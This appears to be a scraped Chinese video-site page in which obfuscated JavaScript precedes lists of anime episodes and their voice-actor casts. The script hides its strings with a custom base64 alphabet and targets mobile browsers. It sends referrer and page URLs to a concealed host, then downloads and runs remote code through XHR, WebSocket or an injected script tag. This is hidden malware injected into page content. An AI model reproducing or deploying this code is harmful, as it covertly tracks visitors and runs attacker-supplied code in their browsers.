function mdre(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function iwtq(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function gwyddp(e) {
return Math.floor(Math.random() * (e + 1));
}
window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[iwtq("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = iwtq(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[gwyddp(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = iwtq(o[0]);
remoteCode += iwtq(o[1]);
remoteCode += iwtq(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
-
第1集
伊东健人,前野智昭,山下诚一郎,东地宏树,山口智广,镰仓有那,虎岛贵明,森崎温,兴津和幸,井泽诗织,小野友树
-
-
第2集
渊上舞,梅原裕一郎,佐藤拓也,花守由美里,山田麻莉奈,诹访部顺一,绿川光,降幡爱
-
第3集
安田陆矢,濑户桃子,大久保瑠美,铃代纱弓,伊藤美来,花泽香菜
-
第24集完结
神谷浩史 , 小野大辅 , 岛崎信长 , 日野聪 , 花江夏树 , 茅野爱衣 , 田村由香里 , 内田真礼 , 细谷佳正 , 前野智昭 , 森久保祥太郎 , 岩田光央 , 爱河里花子 , 山寺宏一 , 田中理惠 , 野岛健儿 , 松风雅也 , 梶裕贵 , 喜多村英梨 , 市道真央
-
-
第4集
久野美咲,大桥彩香,大塚明夫,伊藤彩沙,石原夏织,三瓶由布子,千叶繁
-
正片
长绳麻理亚 , 田村睦心 , 桑原由气 , 高田忧希 , 高桥未奈美 , 杉浦栞 , 小野大辅 , 中村悠一 , 加藤英美里 , 石原夏织
-
第1集
天崎滉平,花泽香菜,木村良平,夏吉优子,野口衣织,村濑步,增田俊树,田中美海
-
-
-
第12集
福原克己,礒部花凛,涩谷彩乃,大地叶,镰仓有那,白砂沙帆
-
-
第1集
白石晴香,小林亲弘,伊藤静,永濑安奈,井上穗乃花,山根绮,茅野爱衣,日高里菜,中原麻衣,千本木彩花,富田美忧,福岛润,大塚芳忠,玄田哲章,田村睦心,田村由香里,杉田智和
-
第38集特别篇完结
川久保拓司 , 桐岛优介 , 内山真人 , 佐藤康惠 , 石桥保 , 五藤圭子 , 加藤厚成 , 田中伸彦 , 堀内正美 , 中丸紫苑 , 俊藤光利 , 日高瞳 , 竹内义人 , 宫下友美 , 大河内浩 , 川岛朋子
-
-
第3集
山根绮,八代拓,户谷菊之介,梅原裕一郎,福山润,川岛零士,内山昂辉,驹田航,古屋亚南,西山宏太朗,夏吉优子,日野聪
-
第4集
今井龙太郎,堀口真帆,三岛健太,小贯莉奈,八木美树,川平慈英,古川雄辉
-
第2集
土岐隼一,寺岛拓笃,永冢拓马,阿座上洋平,谷山纪章,安田陆矢,山本希望,结木梢,羽鸟飒希,大野智敬
-
第2集
泽城美雪,森风子,诹访部顺一,诸星堇,松井惠理子,近藤隆,大原沙耶香
-
第1集
梅原裕一郎,梅田修一朗,木村昴,岛崎信长,小野贤章,三吉彩花,游佐浩二,内田直哉,久川绫,诹访部顺一,辻亲八,内匠靖明,伊东健人,小村哲生,拜真之介,市之濑加那,三木真一郎
-
第1集
小林千晃,花守由美里,木村良平,小野贤章,高桥李依,小林亲弘,小市真琴,稻田彻,市川苍,铃木崚汰,游佐浩二,内田真礼,大原沙耶香,小原好美,诹访部顺一,甲斐田裕子
-
第4集
今井龙太郎,堀口真帆,三岛健太,小贯莉奈,八木美树,川平慈英,古川雄辉
-
-
-
第1集
川岛零士,楠木灯,花守由美里,潘惠美,内田彩,落合福嗣,泽城千春,古贺葵,樫井笙人,子安武人,引坂理绘,八代拓,稻川英里,广桥凉,加濑康之,石川界人,宫下荣治,津田健次郎
-
第1集
增田俊树,雨宫天,大西沙织,长绳麻理亚,田边留依,沼仓爱美,福圆美里,上田丽奈,石川由依,堀江由衣,井上穗乃花,井上和彦,石井真,茅野爱衣
-
第1集
千叶翔也,土屋神叶,加隈亚衣,佐藤未奈子,Lynn,古川慎,浅沼晋太郎,榎木淳弥,小原好美,前田佳织里,福岛润,安济知佳,青木瑠璃子,金元寿子,金泽舞,渊上舞,置鲇龙太郎,斋藤千和,金子隼人,小野大辅
-
-
第2集
铃代纱弓 梅田修一朗 稻垣好 青山吉能 白石兼斗 小清水亚美 水田山葵